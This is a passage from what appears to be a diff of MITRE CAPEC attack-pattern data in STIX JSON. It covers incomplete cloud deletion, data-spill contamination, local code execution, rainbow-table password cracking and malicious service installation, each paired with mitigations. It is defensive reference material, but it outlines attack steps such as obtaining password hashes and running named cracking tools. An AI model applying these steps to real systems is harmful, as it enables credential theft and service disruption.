Such, Assured Deletion in the Cloud: Requirements, Challenges and Future Directions, Association for Computing Machinery (ACM), Proceedings of the 2016 ACM on Cloud Computing Security Workshop", + "external_id": "REF-461", + "source_name": "reference_from_CAPEC", + "url": "https://nms.kcl.ac.uk/jose.such/pubs/Assured_deletion.pdf" + } + ], + "id": "attack-pattern--ed3de4d7-a053-42e4-9f3d-3a6293034e96", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Incomplete Data Deletion in a Multi-Tenant Environment", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (A successful attack that probes application memory will compromise the confidentiality of that data.)" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The cloud provider must not assuredly delete part or all of the sensitive data for which they are responsible.The adversary must have the ability to interact with the system." + ], + "x_capec_skills_required": { + "Low": "The adversary requires the ability to traverse directory structure." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Cloud providers should completely delete data to render it irrecoverable and inaccessible from any layer and component of infrastructure resources.", + "id": "course-of-action--65cd08b2-0269-4a7f-bdf4-e03d2d8374a3", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-546-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e1ffd89f-d766-48a7-b7d3-8d46fe11517b", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--65cd08b2-0269-4a7f-bdf4-e03d2d8374a3", + "spec_version": "2.1", + "target_ref": "attack-pattern--ed3de4d7-a053-42e4-9f3d-3a6293034e96", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Deletion of data should be completed promptly when requested.", + "id": "course-of-action--47ef1ed0-a199-4d71-86a7-db3c41ded30d", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-546-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fd548983-e701-4e46-9b7c-cfc9318fd925", + "modified": 
"2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--47ef1ed0-a199-4d71-86a7-db3c41ded30d", + "spec_version": "2.1", + "target_ref": "attack-pattern--ed3de4d7-a053-42e4-9f3d-3a6293034e96", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary conducts a physical attack a device or component, destroying it such that it no longer functions as intended.", + "external_references": [ + { + "external_id": "CAPEC-547", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/547.html" + } + ], + "id": "attack-pattern--475af086-5223-4210-910a-5217445c0c23", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Physical Destruction of Device or Component", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--576968ad-12ef-46d8-bb10-63f496bcaccb" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary contaminates organizational information systems (including devices and networks) by causing them to handle information of a classification/sensitivity for which they have not been authorized. 
When this happens, the contaminated information system, device, or network must be brought offline to investigate and mitigate the data spill, which denies availability of the system until the investigation is complete.", + "external_references": [ + { + "external_id": "CAPEC-548", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/548.html" + }, + { + "description": "Florida Industrial Security Working Group (FISWG), Managing a “Data Spill”", + "external_id": "REF-742", + "source_name": "reference_from_CAPEC", + "url": "https://fiswg.research.ucf.edu/Documents/PPT/Manage%20a%20Data%20Spill-Contamination%20September%202015.pptx" + }, + { + "description": "data spillage", + "external_id": "REF-743", + "source_name": "reference_from_CAPEC", + "url": "https://csrc.nist.gov/glossary/term/data_spillage" + } + ], + "id": "attack-pattern--61546d1a-d720-4609-89ca-12039268d502", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Contaminate Resource", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_alternate_terms": [ + "Data Spill" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--576968ad-12ef-46d8-bb10-63f496bcaccb" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption (Denial of Service)" + ], + "Confidentiality": [ + "Read Data (Victims of the attack can be exposed to classified materials)" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n An insider threat was able to obtain a classified document. They have knowledge that a backend server which provides access to a website also runs a mail server. The adversary creates a throwaway email address and sends the classified document to the mail server. 
When an administrator checks the mail server they notice that it has processed an email with a classified document and the server has to be taken offline while they investigate the contamination. In the meantime, the website has to be taken down as well and access to the website is denied until the backend can be migrated to another server or the investigation is complete.\n " + ], + "x_capec_extended_description": "Contamination through email is a very common attack vector. Systems with email servers or personal work systems using email are susceptible to this attack simply by receiving an email that contains a classified document or information. A fake classified document could even be used that is mistaken as true classified material. This would still cause the system to be taken offline until the validity of the classified material is confirmed.", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary needs to have real or fake classified/sensitive information to place on a system" + ], + "x_capec_skills_required": { + "High": "The ability to obtain a classified document or information", + "Low": "The ability to fake a classified document" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Properly safeguard classified/sensitive data. 
This includes training cleared individuals to ensure they are handling and disposing of this data properly, as well as ensuring systems only handle information of the classification level they are designed for.", + "id": "course-of-action--0aa74751-a02e-4235-a93e-f1aa62ed6b84", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-548-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--bdc4a136-d354-493f-8f25-63839ff4a8e4", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0aa74751-a02e-4235-a93e-f1aa62ed6b84", + "spec_version": "2.1", + "target_ref": "attack-pattern--61546d1a-d720-4609-89ca-12039268d502", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design systems with redundancy in mind. 
This could mean creating backing servers that could be switched over to in the event that a server has to be taken down for investigation.", + "id": "course-of-action--5b0aac03-449e-47df-ad66-ee4ec2e0a095", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-548-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--817175b0-aa5c-4f89-97d8-45df37bc0eec", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5b0aac03-449e-47df-ad66-ee4ec2e0a095", + "spec_version": "2.1", + "target_ref": "attack-pattern--61546d1a-d720-4609-89ca-12039268d502", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Have a planned and efficient response plan to limit the amount of time a system is offline while the contamination is investigated.", + "id": "course-of-action--e121b3bf-219b-44cd-8130-05d74a7f55f8", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-548-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a768119c-043b-4f7d-afb8-079be4beb9ae", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--e121b3bf-219b-44cd-8130-05d74a7f55f8", + "spec_version": "2.1", + "target_ref": "attack-pattern--61546d1a-d720-4609-89ca-12039268d502", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary installs and executes malicious code on the target system in an effort to achieve a negative technical impact. Examples include rootkits, ransomware, spyware, adware, and others.", + "external_references": [ + { + "external_id": "CAPEC-549", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/549.html" + }, + { + "external_id": "CWE-829", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/829.html" + } + ], + "id": "attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Local Execution of Code", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_follow_refs": [ + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Other (Depending on the type of code executed by the adversary, the consequences of this attack pattern can vary widely.)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Other (Depending on the type of code executed by the adversary, the consequences of this attack pattern can vary widely.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Other (Depending on the type of code executed by the adversary, the consequences of this attack pattern can vary widely.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + 
"x_capec_example_instances": [ + "BlueBorne refers to a set of nine vulnerabilities on different platforms (Linux, Windows, Android, iOS) that offer an adversary the ability to install and execute malicious code on a system if they were close in proximity to a Bluetooth enabled device. One vulnerability affecting iOS versions 7 through 9 allowed an attacker to overflow the Low Energy Audio Protocol since commands sent over this protocol are improperly validated and gain the elevated permissions of the Bluetooth stack. These vulnerabilities were a result of poor validation and were patched shortly after their exposure in 2017, but many non-updated devices remain vulnerable." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_prerequisites": [ + "Knowledge of the target system's vulnerabilities that can be capitalized on with malicious code.The adversary must be able to place the malicious code on the target system." + ], + "x_capec_resources_required": [ + "The means by which the adversary intends to place the malicious code on the system dictates the tools required. For example, suppose the adversary wishes to leverage social engineering and convince a legitimate user to open a malicious file attached to a seemingly legitimate email. 
In this case, the adversary might require a tool capable of wrapping malicious code into an innocuous filetype (e.g., PDF, .doc, etc.)" + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ robust cybersecurity training for all employees.", + "id": "course-of-action--48d83564-0b90-4cb8-8edc-629d4918b8d3", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-549-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3ad56f58-fb37-408f-8a1b-2e3dfa28a602", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--48d83564-0b90-4cb8-8edc-629d4918b8d3", + "spec_version": "2.1", + "target_ref": "attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement system antivirus software that scans all attachments before opening them.", + "id": "course-of-action--bf8bf5fa-93a1-46a0-8d7c-6889986d5167", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-549-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 
"relationship--3b1a3ebf-0fe8-4635-a763-7180f98545ce", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bf8bf5fa-93a1-46a0-8d7c-6889986d5167", + "spec_version": "2.1", + "target_ref": "attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Regularly patch all software.", + "id": "course-of-action--6637d129-28e5-4beb-9e50-e0127d76b7ec", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-549-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--281bf316-0912-4859-9ffe-bb8474a7bad4", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6637d129-28e5-4beb-9e50-e0127d76b7ec", + "spec_version": "2.1", + "target_ref": "attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Execute all suspicious files in a sandbox environment.", + "id": "course-of-action--d0e49c00-06b2-426e-a1dc-9aaeb4cafb97", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-549-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": 
"3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--05a27f3b-76b2-4510-9609-7f3d05b0d792", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d0e49c00-06b2-426e-a1dc-9aaeb4cafb97", + "spec_version": "2.1", + "target_ref": "attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker gets access to the database table where hashes of passwords are stored. They then use a rainbow table of pre-computed hash chains to attempt to look up the original password. Once the original password corresponding to the hash is obtained, the attacker uses the original password to gain access to the system.", + "external_references": [ + { + "external_id": "CAPEC-55", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/55.html" + }, + { + "external_id": "CWE-261", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/261.html" + }, + { + "external_id": "CWE-521", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/521.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "external_id": "CWE-916", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/916.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": 
"http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "description": "Brute Force:Password Cracking", + "external_id": "T1110.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1110/002" + } + ], + "id": "attack-pattern--a390cb72-b4de-4750-ae05-be556c89f4be", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Rainbow Table Password Cracking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "BusyBox 1.1.1 does not use a salt when generating passwords, which makes it easier for local users to guess passwords from a stolen password file using techniques such as rainbow tables. See also: CVE-2006-1058" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine application's/system's password policy: Determine the password policies of the target application/system.

  2. Techniques
    Determine minimum and maximum allowed password lengths.
    Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc.).
    Determine account lockout policy (a strict account lockout policy will prevent brute force attacks).
  3. Obtain password hashes: An attacker gets access to the database table storing hashes of passwords or potentially just discovers a hash of an individual password.

  4. Techniques
    Obtain copy of database table or flat file containing password hashes (by breaking access controls, using SQL Injection, etc.)
    Obtain password hashes from platform-specific storage locations (e.g. Windows registry)
    Sniff network packets containing password hashes.

Exploit

  1. Run rainbow table-based password cracking tool: An attacker finds or writes a password cracking tool that uses a previously computed rainbow table for the right hashing algorithm. It helps if the attacker knows what hashing algorithm was used by the password system.

  2. Techniques
    Run rainbow table-based password cracking tool such as Ophcrack or RainbowCrack. Reduction function must depend on application's/system's password policy.
", + "x_capec_extended_description": "\n A password rainbow table stores hash chains for various passwords. A password chain is computed, starting from the original password, P, via a reduce(compression) function R and a hash function H. A recurrence relation exists where Xi+1 = R(H(Xi)), X0 = P. Then the hash chain of length n for the original password P can be formed: X1, X2, X3, ... , Xn-2, Xn-1, Xn, H(Xn). P and H(Xn) are then stored together in the rainbow table. Constructing the rainbow tables takes a very long time and is computationally expensive. A separate table needs to be constructed for the various hash algorithms (e.g. SHA1, MD5, etc.). However, once a rainbow table is computed, it can be very effective in cracking the passwords that have been hashed without the use of salt.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Hash of the original password is available to the attacker. For a better chance of success, an attacker should have more than one hash of the original password, and ideally the whole table.", + "Salt was not used to create the hash of the original password. Otherwise the rainbow tables have to be re-computed, which is very expensive and will make the attack effectively infeasible (especially if salt was added in iterations).", + "The system uses one factor password based authentication." + ], + "x_capec_resources_required": [ + "Rainbow table of password hash chains with the right algorithm used. A password cracking tool that leverages this rainbow table will also be required. Hash(es) of the password is required." + ], + "x_capec_skills_required": { + "Low": "A variety of password cracking tools are available that can leverage a rainbow table. The more difficult part is to obtain the password hash(es) in the first place." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use salt when computing password hashes. That is, concatenate the salt (random bits) with the original password prior to hashing it.", + "id": "course-of-action--54756aa7-5cd0-4c09-90b0-4bcb64715e00", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-55-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--59fee1cf-5b04-404d-9ef4-ed4d63ce8317", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--54756aa7-5cd0-4c09-90b0-4bcb64715e00", + "spec_version": "2.1", + "target_ref": "attack-pattern--a390cb72-b4de-4750-ae05-be556c89f4be", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "When an operating system starts, it also starts programs called services or daemons. Adversaries may install a new service which will be executed at startup (on a Windows system, by modifying the registry). The service name may be disguised by using a name from a related operating system or benign software. 
Services are usually run with elevated privileges.", + "external_references": [ + { + "external_id": "CAPEC-550", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/550.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Create or Modify System Process", + "external_id": "T1543", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1543" + } + ], + "id": "attack-pattern--aef8e9e0-4714-4890-9470-06276c61abfd", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Install New Service", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Limit privileges of user accounts so new service creation can only be performed by authorized administrators.", + "id": "course-of-action--ed7ccb18-f2f9-4895-b561-75c72e739be9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-550-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f2eb507a-dfa5-4dd3-8046-bcd8964aa9ec", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ed7ccb18-f2f9-4895-b561-75c72e739be9", + 
"spec_version": "2.1", + "target_ref": "attack-pattern--aef8e9e0-4714-4890-9470-06276c61abfd", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "When an operating system starts, it also starts programs called services or daemons. Modifying existing services may break existing services or may enable services that are disabled/not commonly used.", + "external_references": [ + { + "external_id": "CAPEC-551", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/551.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "description": "Create or Modify System Process", + "external_id": "T1543", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1543" + } + ], + "id": "attack-pattern--13e147c3-7baa-4ec4-aafd-9135d46545cc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Modify Existing Service", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Limit privileges of user accounts so service changes can only be performed by authorized administrators. 
Also monitor any service changes that may occur inadvertently.", + "id": "course-of-action--f3d72fe1-750b-47c0-9526-4728852a4e5b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-551-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f0245e1a-1d11-480f-a078-397f1133e3d3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f3d72fe1-750b-47c0-9526-4728852a4e5b", + "spec_version": "2.1", + "target_ref": "attack-pattern--13e147c3-7baa-4ec4-aafd-9135d46545cc", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in authentication to install malware that alters the functionality and information provide by targeted operating system API calls. 
